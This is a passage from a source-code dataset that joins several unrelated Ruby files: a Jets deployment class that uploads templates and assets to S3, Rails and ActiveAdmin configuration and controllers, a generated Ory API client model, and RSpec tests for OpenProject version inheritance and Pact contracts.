exit_failure(usage + argument_missing_msg(field_name, field_number))
else
field_value = args[field_number - 1]
end
options[field_symbol] = field_value
end
def build_key_object(name, key, expiration_date)
{
"name" => name,
"public_key" => key,
"expiration_date" => expiration_date,
}
end
def output_simple_key_results(results)
results.each do |result|
puts "\nname: #{result["name"]}"
puts "expired: #{result["expired"]}"
end
end
def output_full_key_results(results)
results.each do |result|
result = result[1]
puts "\nname: #{result.name}"
puts "expiration_date: #{result.expiration_date}"
puts "public_key:"
puts result.public_key
end
end
######################
# message generators #
######################
def missing_input_msg(arg)
"Error: Missing valid input for argument #{arg}."
end
def invalid_date_msg
<<EOS
--expiration-date must be followed by a valid ISO 8601 formatted string YYYY-MM-DDTHH:MM:SSZ e.g. 2013-12-24T21:00:00Z or infinity.
It defaults to infinity if you do not pass --expiration-date.
EOS
end
def not_a_public_key_msg
<<EOS
Error: Invalid public key passed. Key must begin with:
Error: -----BEGIN PUBLIC KEY----- or
Error: -----BEGIN RSA PUBLIC KEY-----
EOS
end
def public_key_path_msg
"Error: --public-key-path PUBLIC_KEY_PATH must be a valid path."
end
def missing_valid_input_msg(arg)
"Error: Missing valid input for argument #{arg}."
end
def invalid_arg_msg(arg)
"Error: Invalid argument #{arg} detected. Please remove or use a different command."
end
def argument_missing_msg(field_name, field_number)
"\nError: You forgot to pass #{field_name}, which should have been argument number #{field_number}."
end
def pass_key_name_if_public_key_missing
<<EOS
Error: You did not pass --public-key-path or --key-name.
Error: A key-name cannot be auto-generated if you do not pass --public-key-path.
Error: Either pass a valid public key via --public-key path or supply a name via --key-name.
EOS
end
def print_private_key(key_name, private_key_string)
puts "New private key for key named #{key_name} (please store, it is not saved in the database):"
puts private_key_string
end
end
end
end
| 33.111702 | 171 | 0.644337 |
035b4df1ae76d4eb089ee3ec6f5dc9a9d3ea5844 | 7,683 | require 'action_view'
class Jets::Cfn
class Ship
include Jets::Timing
include Jets::AwsServices
include ActionView::Helpers::NumberHelper # number_to_human_size
def initialize(options)
@options = options
@parent_stack_name = Jets::Naming.parent_stack_name
@template_path = Jets::Naming.parent_template_path
end
def run
      # the s3 bucket is only available when stack_type is full
      upload_to_s3 if @options[:stack_type] == :full
stack_in_progress?(@parent_stack_name)
puts "Deploying CloudFormation stack with jets app!"
begin
save_stack
rescue Aws::CloudFormation::Errors::InsufficientCapabilitiesException => e
capabilities = e.message.match(/\[(.*)\]/)[1]
confirm = prompt_for_iam(capabilities)
if confirm =~ /^y/
@options.merge!(capabilities: [capabilities])
puts "Re-running: #{command_with_iam(capabilities).colorize(:green)}"
retry
else
puts "Exited"
exit 1
end
end
wait_for_stack
prewarm
show_api_endpoint
end
time :run
def save_stack
if stack_exists?(@parent_stack_name)
update_stack
else
create_stack
end
end
def create_stack
      # the parent stack template is on the filesystem; child stack templates are on s3
cfn.create_stack(stack_options)
end
time :create_stack
def update_stack
begin
cfn.update_stack(stack_options)
rescue Aws::CloudFormation::Errors::ValidationError => e
puts "ERROR: #{e.message}".red
true # error
end
end
time :update_stack
# options common to both create_stack and update_stack
def stack_options
{
stack_name: @parent_stack_name,
template_body: IO.read(@template_path),
capabilities: capabilities, # ["CAPABILITY_IAM", "CAPABILITY_NAMED_IAM"]
# disable_rollback: !@options[:rollback],
}
end
# check for /(_COMPLETE|_FAILED)$/ status
def wait_for_stack
Jets::Cfn::Status.new(@options).wait
end
time :wait_for_stack
def prewarm
return unless @options[:stack_type] == :full # s3 bucket is available
return unless Jets.config.prewarm.enable
return if Jets::Commands::Build.poly_only?
puts "Prewarming application..."
if Jets::PreheatJob::CONCURRENCY > 1
Jets::PreheatJob.perform_now(:torch, {quiet: true})
else
Jets::PreheatJob.perform_now(:warm, {quiet: true})
end
end
def show_api_endpoint
return unless @options[:stack_type] == :full # s3 bucket is available
return if Jets::Router.routes.empty?
resp, status = stack_status
return if status.include?("ROLLBACK")
resp = cfn.describe_stack_resources(stack_name: @parent_stack_name)
resources = resp.stack_resources
api_gateway = resources.find { |resource| resource.logical_resource_id == "ApiGateway" }
stack_id = api_gateway["physical_resource_id"]
resp = cfn.describe_stacks(stack_name: stack_id)
stack = resp["stacks"].first
output = stack["outputs"].find { |o| o["output_key"] == "RestApiUrl" }
endpoint = output["output_value"]
puts "API Gateway Endpoint: #{endpoint}"
end
# All CloudFormation states listed here:
# http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/using-cfn-describing-stacks.html
def stack_status
resp = cfn.describe_stacks(stack_name: @parent_stack_name)
status = resp.stacks[0].stack_status
[resp, status]
end
def prompt_for_iam(capabilities)
puts "This stack will create IAM resources. Please approve to run the command again with #{capabilities} capabilities."
puts " #{command_with_iam(capabilities)}"
puts "Please confirm (y/n)"
$stdin.gets # confirm
end
def command_with_iam(capabilities)
"#{File.basename($0)} #{ARGV.join(' ')} --capabilities #{capabilities}"
end
def capabilities
["CAPABILITY_IAM", "CAPABILITY_NAMED_IAM"] # TODO: remove capabilities hardcode
# return @options[:capabilities] if @options[:capabilities]
# if @options[:iam]
# ["CAPABILITY_IAM", "CAPABILITY_NAMED_IAM"]
# end
end
# Upload both code and child templates to s3
def upload_to_s3
raise "Did not specify @options[:s3_bucket] #{@options[:s3_bucket].inspect}" unless @options[:s3_bucket]
upload_cfn_templates
upload_code
upload_assets
end
time :upload_to_s3
def bucket_name
@options[:s3_bucket]
end
def upload_cfn_templates
puts "Uploading child CloudFormation templates to S3"
expression = "#{Jets::Naming.template_path_prefix}-*"
Dir.glob(expression).each do |path|
next unless File.file?(path)
key = "jets/cfn-templates/#{File.basename(path)}"
obj = s3_resource.bucket(bucket_name).object(key)
obj.upload_file(path)
end
end
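# Illustration only (the local template name is made up): a generated child template such as
# demo-dev-api-gateway.yml would be uploaded to s3://<bucket>/jets/cfn-templates/demo-dev-api-gateway.yml,
# since the S3 key is "jets/cfn-templates/" plus the file's basename.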
def upload_code
md5_code_zipfile = Jets::Naming.md5_code_zipfile
file_size = number_to_human_size(File.size(md5_code_zipfile))
puts "Uploading #{md5_code_zipfile} (#{file_size}) to S3"
start_time = Time.now
key = Jets::Naming.code_s3_key
obj = s3_resource.bucket(bucket_name).object(key)
obj.upload_file(md5_code_zipfile)
puts "Time to upload code to s3: #{pretty_time(Time.now-start_time).colorize(:green)}"
end
def upload_assets
puts "Uploading public assets"
start_time = Time.now
asset_folders = Jets.config.assets.folders
asset_folders.each do |folder|
upload_asset_folder(folder)
end
puts "Time to upload public assets to s3: #{pretty_time(Time.now-start_time).colorize(:green)}"
end
def upload_asset_folder(folder)
expression = "#{Jets.root}public/#{folder}/**/*"
group_size = 10
Dir.glob(expression).each_slice(group_size) do |paths|
threads = []
paths.each do |path|
next unless File.file?(path)
regexp = Regexp.new(".*/#{folder}/")
relative_path = path.sub(regexp,'')
file = "#{folder}/#{relative_path}"
threads << Thread.new do
upload_asset_file(file)
end
end
threads.each(&:join)
end
end
def upload_asset_file(file)
path = "#{Jets.root}public/#{file}"
key = "jets/public/#{file}"
puts "Uploading s3://#{bucket_name}/#{key}" # uncomment to see and debug
obj = s3_resource.bucket(bucket_name).object(key)
obj.upload_file(path, acl: "public-read", cache_control: cache_control)
end
# If cache_control is provided, then it will set the entire cache-control header.
# If only max_age is provided, then we'll generate a cache_control header.
# Using max_age is the shorter and simpler way of setting the cache_control header.
def cache_control
cache_control = Jets.config.assets.cache_control
unless cache_control
max_age = Jets.config.assets.max_age # defaults to 3600 in jets/application.rb
cache_control = "public, max-age=#{max_age}"
end
cache_control
end
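# Quick sketch of the behavior (numbers are hypothetical):
#   Jets.config.assets.cache_control = nil
#   Jets.config.assets.max_age = 7200
#   cache_control # => "public, max-age=7200"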
def s3_bucket
@options[:s3_bucket]
end
# http://stackoverflow.com/questions/4175733/convert-duration-to-hoursminutesseconds-or-similar-in-rails-3-or-ruby
def pretty_time(total_seconds)
minutes = (total_seconds / 60) % 60
seconds = total_seconds % 60
if total_seconds < 60
"#{seconds.to_i}s"
else
"#{minutes.to_i}m #{seconds.to_i}s"
end
end
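# Example outputs (durations are made up):
#   pretty_time(42)  # => "42s"
#   pretty_time(125) # => "2m 5s"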
end
end
| 31.105263 | 126 | 0.654692 |
33bc58dadd658a7755c5f4fe1ca49ad7a3643e2e | 2,534 | ActiveAdmin.setup do |config|
#
# Add active admin pages from this engine
#
config.load_paths << File.expand_path("../../../app/admin", __FILE__)
# == User Authentication
#
# Active Admin will automatically call an authentication
# method in a before filter of all controller actions to
# ensure that there is a currently logged in admin user.
#
# This setting changes the method which Active Admin calls
# within the controller.
config.authentication_method = :authenticate_admin_user!
# == Current User
#
# Active Admin will associate actions with the current
# user performing them.
#
# This setting changes the method which Active Admin calls
# to return the currently logged in user.
config.current_user_method = :current_admin_user
# == Logging Out
#
# Active Admin displays a logout link on each screen. These
# settings configure the location and method used for the link.
#
# This setting changes the path where the link points to. If it's
# a string, the strings is used as the path. If it's a Symbol, we
# will call the method to return the path.
#
# Default:
config.logout_link_path = :destroy_admin_user_session_path
# This setting changes the http method used when rendering the
# link. For example :get, :delete, :put, etc.
#
# Default:
# config.logout_link_method = :get
# == Admin Comments
#
# Admin comments allow you to add comments to any model for admin use.
# Admin comments are enabled by default.
#
# Default:
config.allow_comments = false
#
# You can turn them on and off for any given namespace by using a
# namespace config block.
#
# Eg:
# config.namespace :without_comments do |without_comments|
# without_comments.allow_comments = false
# end
# == Controller Filters
#
# You can add before, after and around filters to all of your
# Active Admin resources from here.
#
# config.before_filter :do_something_awesome
# == Register Stylesheets & Javascripts
#
# We recommend using the built in Active Admin layout and loading
# up your own stylesheets / javascripts to customize the look
# and feel.
#
# To load a stylesheet:
config.register_stylesheet 'cmsgem/active_admin'
#
# You can provide an options hash for more control, which is passed along to stylesheet_link_tag():
# config.register_stylesheet 'my_print_stylesheet.css', :media => :print
#
# To load a javascript file:
config.register_javascript 'active_admin_custom.js'
end
| 28.47191 | 101 | 0.714286 |
7965ea38788c45be350d8d88a74fdc2aa81a083c | 1,462 | # frozen_string_literal: true
class ProfileController < ApplicationController
before_action :authenticate_user!
before_action :check_group_2fa
before_action :set_flash_on_restrictions
def show
@template = Liquid::Template.parse(Setting.registered_home_template)
@logins = current_user
.logins
.includes([:service_provider])
.select(
'DISTINCT ON(logins.service_provider_id) logins.*'
)
.order(service_provider_id: :desc, created_at: :desc)
.limit(10)
end
def template_variables # rubocop:disable Metrics/MethodLength
if current_user
{
'user' => {
'username' => current_user.username,
'email' => current_user.email
},
'groups' => current_user.groups.pluck(:name)
}
else
{}
end
end
helper_method :template_variables
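# Illustrative only: a registered_home_template rendered with these variables could use
# standard Liquid syntax such as "Welcome back, {{ user.username }}" or
# "{% for group in groups %}{{ group }} {% endfor %}" (the template content itself is an assumption).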
protected
def check_group_2fa
@two_factor_required = []
return if current_user.two_factor_enabled?
groups = current_user.groups.where(requires_2fa: true)
@two_factor_required = groups.pluck(:name) if groups.any?
end
def set_flash_on_restrictions
@two_factor_required.each do |name|
flash[name] = "You are a member of the group '#{name}' and it requires " \
"two factor. This group won't be accessible until you " \
'enable two-factor on your account'
end
end
end
| 27.584906 | 80 | 0.638851 |
011040abfb007f768623fec5df267e118064561b | 745 | # frozen_string_literal: true
class FlagController < ApplicationController
# Authentication
before_action :authenticate_user
after_action :renew_token
# Authorization
after_action :verify_authorized
##
# Resource
#
# POST /flag
def create
@annotation = params[:comment_id] ? Comment.find(params[:comment_id]) : Conversation.find(params[:conversation_id])
authorize @annotation, :flag?
if @annotation.flag
jsonapi_render :json => @annotation, :options => { :resource => annotation_resource }
else
jsonapi_render_errors :json => @annotation, :status => :unprocessable_entity
end
end
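# Illustrative requests (ids are made up):
#   POST /flag?comment_id=42      flags Comment 42
#   POST /flag?conversation_id=7  flags Conversation 7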
protected
def annotation_resource
ApplicationResource.resource_for @annotation.type
end
end
| 21.911765 | 119 | 0.728859 |
ab413017a11daf147e20f64e4901132ecb0cab08 | 6,724 | =begin
#Ory APIs
#Documentation for all public and administrative Ory APIs. Administrative APIs can only be accessed with a valid Personal Access Token. Public APIs are mostly used in browsers.
The version of the OpenAPI document: v0.0.1-alpha.19
Contact: [email protected]
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 5.2.1
=end
require 'date'
require 'time'
module OryClient
class ErrorResponse
# The error message.
attr_accessor :message
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'message' => :'message'
}
end
# Returns all the JSON keys this model knows about
def self.acceptable_attributes
attribute_map.values
end
# Attribute type mapping.
def self.openapi_types
{
:'message' => :'String'
}
end
# List of attributes with nullable: true
def self.openapi_nullable
Set.new([
])
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `OryClient::ErrorResponse` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `OryClient::ErrorResponse`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'message')
self.message = attributes[:'message']
end
end
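# Minimal usage sketch (the message text is made up):
#   err = OryClient::ErrorResponse.new(message: 'The requested resource could not be found')
#   err.valid? # => true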
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @message.nil?
invalid_properties.push('invalid value for "message", message cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @message.nil?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
message == o.message
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[message].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key)
self.send("#{key}=", nil)
elsif type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :Time
Time.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
# models (e.g. Pet) or oneOf
klass = OryClient.const_get(type)
klass.respond_to?(:openapi_one_of) ? klass.build(value) : klass.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
if value.nil?
is_nullable = self.class.openapi_nullable.include?(attr)
next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}"))
end
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 29.884444 | 202 | 0.627454 |
288d85eed33a3f26504092bc63d00fc0f2e81c55 | 18,665 | #-- copyright
# OpenProject is an open source project management software.
# Copyright (C) 2012-2021 the OpenProject GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
require File.expand_path(File.dirname(__FILE__) + '/../../spec_helper')
describe WorkPackages::UpdateService, "version inheritance", type: :model do
let(:type_feature) { FactoryBot.build(:type_feature) }
let(:type_task) { FactoryBot.build(:type_task) }
let(:type_bug) { FactoryBot.build(:type_bug) }
let(:version1) { project.versions.first }
let(:version2) { project.versions.last }
let(:role) { FactoryBot.build(:role) }
let(:user) { FactoryBot.build(:admin) }
let(:issue_priority) { FactoryBot.build(:priority) }
let(:status) { FactoryBot.build(:status, name: 'status 1', is_default: true) }
let(:project) do
p = FactoryBot.build(:project,
members: [FactoryBot.build(:member,
principal: user,
roles: [role])],
types: [type_feature, type_task, type_bug])
p.versions << FactoryBot.build(:version, name: 'Version1', project: p)
p.versions << FactoryBot.build(:version, name: 'Version2', project: p)
p
end
let(:story) do
story = FactoryBot.build(:work_package,
subject: 'Story',
project: project,
type: type_feature,
version: version1,
status: status,
author: user,
priority: issue_priority)
story
end
let(:story2) do
story = FactoryBot.build(:work_package,
subject: 'Story2',
project: project,
type: type_feature,
version: version1,
status: status,
author: user,
priority: issue_priority)
story
end
let(:story3) do
story = FactoryBot.build(:work_package,
subject: 'Story3',
project: project,
type: type_feature,
version: version1,
status: status,
author: user,
priority: issue_priority)
story
end
let(:task) do
FactoryBot.build(:work_package,
subject: 'Task',
type: type_task,
version: version1,
project: project,
status: status,
author: user,
priority: issue_priority)
end
let(:task2) do
FactoryBot.build(:work_package,
subject: 'Task2',
type: type_task,
version: version1,
project: project,
status: status,
author: user,
priority: issue_priority)
end
let(:task3) do
FactoryBot.build(:work_package,
subject: 'Task3',
type: type_task,
version: version1,
project: project,
status: status,
author: user,
priority: issue_priority)
end
let(:task4) do
FactoryBot.build(:work_package,
subject: 'Task4',
type: type_task,
version: version1,
project: project,
status: status,
author: user,
priority: issue_priority)
end
let(:task5) do
FactoryBot.build(:work_package,
subject: 'Task5',
type: type_task,
version: version1,
project: project,
status: status,
author: user,
priority: issue_priority)
end
let(:task6) do
FactoryBot.build(:work_package,
subject: 'Task6',
type: type_task,
version: version1,
project: project,
status: status,
author: user,
priority: issue_priority)
end
let(:bug) do
FactoryBot.build(:work_package,
subject: 'Bug',
type: type_bug,
version: version1,
project: project,
status: status,
author: user,
priority: issue_priority)
end
let(:bug2) do
FactoryBot.build(:work_package,
subject: 'Bug2',
type: type_bug,
version: version1,
project: project,
status: status,
author: user,
priority: issue_priority)
end
let(:bug3) do
FactoryBot.build(:work_package,
subject: 'Bug3',
type: type_bug,
version: version1,
project: project,
status: status,
author: user,
priority: issue_priority)
end
before(:each) do
project.save!
allow(Setting).to receive(:plugin_openproject_backlogs).and_return({ 'points_burn_direction' => 'down',
'wiki_template' => '',
'card_spec' => 'Sattleford VM-5040',
'story_types' => [type_feature.id],
'task_type' => type_task.id.to_s })
end
def standard_child_layout
# Layout is
# child
# -> task3
# -> task4
# -> bug3
# -> task5
# -> story3
# -> task6
task3.parent_id = child.id
task3.save!
task4.parent_id = child.id
task4.save!
bug3.parent_id = child.id
bug3.save!
story3.parent_id = child.id
story3.save!
task5.parent_id = bug3.id
task5.save!
task6.parent_id = story3.id
task6.save!
child.reload
end
describe 'WHEN changing version' do
let(:instance) { described_class.new(user: user, model: parent) }
shared_examples_for "changing parent's version changes child's version" do
it "SHOULD change the child's version to the parent's version" do
parent.save!
child.parent_id = parent.id
child.save!
standard_child_layout
parent.reload
call = instance.call(version: version2)
expect(call).to be_success
# Because of performance, these assertions are all in one it statement
expect(child.reload.version).to eql version2
expect(task3.reload.version).to eql version2
expect(task4.reload.version).to eql version2
expect(bug3.reload.version).to eql version1
expect(story3.reload.version).to eql version1
expect(task5.reload.version).to eql version1
expect(task6.reload.version).to eql version1
end
end
shared_examples_for "changing parent's version does not change child's version" do
it "SHOULD keep the child's version" do
parent.save!
child.parent_id = parent.id
child.save!
standard_child_layout
parent.reload
instance.call(version: version2)
# Because of performance, these assertions are all in one it statement
expect(child.reload.version).to eql version1
expect(task3.reload.version).to eql version1
expect(task4.reload.version).to eql version1
expect(bug3.reload.version).to eql version1
expect(story3.reload.version).to eql version1
expect(task5.reload.version).to eql version1
expect(task6.reload.version).to eql version1
end
end
describe 'WITH backlogs enabled' do
before(:each) do
project.enabled_module_names += ['backlogs']
end
describe 'WITH a story' do
let(:parent) { story }
describe 'WITH a task as child' do
let(:child) { task2 }
it_should_behave_like "changing parent's version changes child's version"
end
describe 'WITH a non backlogs work_package as child' do
let(:child) { bug2 }
it_should_behave_like "changing parent's version does not change child's version"
end
describe 'WITH a story as a child' do
let(:child) { story2 }
it_should_behave_like "changing parent's version does not change child's version"
end
end
describe 'WITH a task (impediment) without a parent' do
let(:parent) { task }
describe 'WITH a task as child' do
let(:child) { task2 }
it_should_behave_like "changing parent's version changes child's version"
end
describe 'WITH a non backlogs work_package as child' do
let(:child) { bug }
it_should_behave_like "changing parent's version does not change child's version"
end
end
describe 'WITH a non backlogs work_package' do
let(:parent) { bug }
describe 'WITH a task as child' do
let(:child) { task }
it_should_behave_like "changing parent's version does not change child's version"
end
describe 'WITH a non backlogs work_package as child' do
let(:child) { bug2 }
it_should_behave_like "changing parent's version does not change child's version"
end
describe 'WITH a story as a child' do
let(:child) { story }
it_should_behave_like "changing parent's version does not change child's version"
end
end
end
describe 'WITH backlogs disabled' do
before(:each) do
project.enabled_module_names = project.enabled_module_names.find_all { |n| n != 'backlogs' }
end
describe 'WITH a story' do
let(:parent) { story }
describe 'WITH a task as child' do
let(:child) { task2 }
it_should_behave_like "changing parent's version does not change child's version"
end
describe 'WITH a non backlogs work_package as child' do
let(:child) { bug2 }
it_should_behave_like "changing parent's version does not change child's version"
end
describe 'WITH a story as a child' do
let(:child) { story2 }
it_should_behave_like "changing parent's version does not change child's version"
end
end
describe 'WITH a task' do
before(:each) do
bug2.save!
task.parent_id = bug2.id # so that it is considered a task
task.save!
end
let(:parent) { task }
describe 'WITH a task as child' do
let(:child) { task2 }
it_should_behave_like "changing parent's version does not change child's version"
end
describe 'WITH a non backlogs work_package as child' do
let(:child) { bug }
it_should_behave_like "changing parent's version does not change child's version"
end
end
describe 'WITH a task (impediment) without a parent' do
let(:parent) { task }
describe 'WITH a task as child' do
let(:child) { task2 }
it_should_behave_like "changing parent's version does not change child's version"
end
describe 'WITH a non backlogs work_package as child' do
let(:child) { bug }
it_should_behave_like "changing parent's version does not change child's version"
end
end
describe 'WITH a non backlogs work_package' do
let(:parent) { bug }
describe 'WITH a task as child' do
let(:child) { task }
it_should_behave_like "changing parent's version does not change child's version"
end
describe 'WITH a non backlogs work_package as child' do
let(:child) { bug2 }
it_should_behave_like "changing parent's version does not change child's version"
end
describe 'WITH a story as a child' do
let(:child) { story }
it_should_behave_like "changing parent's version does not change child's version"
end
end
end
end
describe 'WHEN changing the parent_id' do
let(:instance) { described_class.new(user: user, model: child) }
shared_examples_for "changing the child's parent_issue to the parent changes child's version" do
it "SHOULD change the child's version to the parent's version" do
child.save!
standard_child_layout
parent.version = version2
parent.save!
instance.call(parent_id: parent.id)
# Because of performance, these assertions are all in one it statement
expect(child.reload.version).to eql version2
expect(task3.reload.version).to eql version2
expect(task4.reload.version).to eql version2
expect(bug3.reload.version).to eql version1
expect(story3.reload.version).to eql version1
expect(task5.reload.version).to eql version1
expect(task6.reload.version).to eql version1
end
end
shared_examples_for "changing the child's parent to the parent leaves child's version" do
it "SHOULD keep the child's version" do
child.save!
standard_child_layout
parent.version = version2
parent.save!
instance.call(parent_id: parent.id)
# Because of performance, these assertions are all in one it statement
expect(child.reload.version).to eql version1
expect(task3.reload.version).to eql version1
expect(task4.reload.version).to eql version1
expect(bug3.reload.version).to eql version1
expect(story3.reload.version).to eql version1
expect(task5.reload.version).to eql version1
expect(task6.reload.version).to eql version1
end
end
describe 'WITH backlogs enabled' do
before(:each) do
story.project.enabled_module_names += ['backlogs']
end
describe 'WITH a story as parent' do
let(:parent) { story }
describe 'WITH a story as child' do
let(:child) { story2 }
it_should_behave_like "changing the child's parent to the parent leaves child's version"
end
describe 'WITH a task as child' do
let(:child) { task2 }
it_should_behave_like "changing the child's parent_issue to the parent changes child's version"
end
describe 'WITH a non-backlogs work_package as child' do
let(:child) { bug2 }
it_should_behave_like "changing the child's parent to the parent leaves child's version"
end
end
describe "WITH a story as parent
WITH the story having a non backlogs work_package as parent
WITH a task as child" do
before do
bug2.save!
story.parent_id = bug2.id
story.save!
end
let(:parent) { story }
let(:child) { task2 }
it_should_behave_like "changing the child's parent_issue to the parent changes child's version"
end
describe 'WITH a task as parent' do
before(:each) do
story.save!
task.parent_id = story.id
task.save!
story.reload
task.reload
end
# Needs to be the story because it is not possible to change a task's
# 'version_id'
let(:parent) { story }
describe 'WITH a task as child' do
let(:child) { task2 }
it_should_behave_like "changing the child's parent_issue to the parent changes child's version"
end
describe 'WITH a non-backlogs work_package as child' do
let(:child) { bug2 }
it_should_behave_like "changing the child's parent to the parent leaves child's version"
end
end
describe 'WITH an impediment (task) as parent' do
let(:parent) { task }
describe 'WITH a task as child' do
let(:child) { task2 }
it_should_behave_like "changing the child's parent_issue to the parent changes child's version"
end
describe 'WITH a non-backlogs work_package as child' do
let(:child) { bug2 }
it_should_behave_like "changing the child's parent to the parent leaves child's version"
end
end
describe 'WITH a non-backlogs work_package as parent' do
let(:parent) { bug }
describe 'WITH a story as child' do
let(:child) { story2 }
it_should_behave_like "changing the child's parent to the parent leaves child's version"
end
describe 'WITH a task as child' do
let(:child) { task2 }
it_should_behave_like "changing the child's parent to the parent leaves child's version"
end
describe 'WITH a non-backlogs work_package as child' do
let(:child) { bug2 }
it_should_behave_like "changing the child's parent to the parent leaves child's version"
end
end
end
end
end
| 31.905983 | 109 | 0.573265 |
87fc8611fcf26b53f2e721c44f9cb9cc4d64ce0a | 7,074 | require 'spec_helper'
require 'pact/consumer_contract'
module Pact
describe ConsumerContract do
describe "as_json" do
class MockInteraction
def as_json(options = {})
{:mock => "interaction"}
end
end
def silence_warnings
old_verbose, $VERBOSE = $VERBOSE, nil
yield
ensure
$VERBOSE = old_verbose
end
before do
@backup_version = Pact::VERSION
silence_warnings do
Pact::VERSION = "1.0"
end
DateTime.stub(:now).and_return(DateTime.strptime("2013-08-15T13:27:13+10:00"))
end
let(:service_consumer) { double('ServiceConsumer', :as_json => {:a => 'consumer'}) }
let(:service_provider) { double('ServiceProvider', :as_json => {:a => 'provider'}) }
let(:pact) { ConsumerContract.new({:interactions => [MockInteraction.new], :consumer => service_consumer, :provider => service_provider }) }
let(:expected_as_json) { {:provider=>{:a=>"provider"}, :consumer=>{:a=>"consumer"}, :interactions=>[{:mock=>"interaction"}], :metadata=>{:pact_gem=>{:version=>"1.0"}}} }
it "should return a hash representation of the Pact" do
pact.as_json.should eq expected_as_json
end
after do
silence_warnings do
Pact::VERSION = @backup_version
end
end
end
describe ".from_json" do
let(:loaded_pact) { ConsumerContract.from_json(string) }
context "when the top level object is a ConsumerContract" do
let(:string) { '{"interactions":[{"request": {"path":"/path", "method" : "get"}}], "consumer": {"name" : "Bob"} , "provider": {"name" : "Mary"} }' }
it "should create a Pact" do
loaded_pact.should be_instance_of ConsumerContract
end
it "should have interactions" do
loaded_pact.interactions.should be_instance_of Array
end
it "should have a consumer" do
loaded_pact.consumer.should be_instance_of Pact::ServiceConsumer
end
it "should have a provider" do
loaded_pact.provider.should be_instance_of Pact::ServiceProvider
end
end
context "with old 'producer' key" do
let(:string) { File.read('./spec/support/a_consumer-a_producer.json')}
it "should create a Pact" do
loaded_pact.should be_instance_of ConsumerContract
end
it "should have interactions" do
loaded_pact.interactions.should be_instance_of Array
end
it "should have a consumer" do
loaded_pact.consumer.should be_instance_of Pact::ServiceConsumer
end
it "should have a provider" do
loaded_pact.provider.should be_instance_of Pact::ServiceProvider
loaded_pact.provider.name.should eq "an old producer"
end
it "should have a provider_state" do
loaded_pact.interactions.first.provider_state.should eq 'state one'
end
end
end
describe "find_interactions" do
let(:consumer) { double('Pact::ServiceConsumer', :name => 'Consumer')}
let(:provider) { double('Pact::ServiceProvider', :name => 'Provider')}
let(:interaction) { double('Pact::Interaction') }
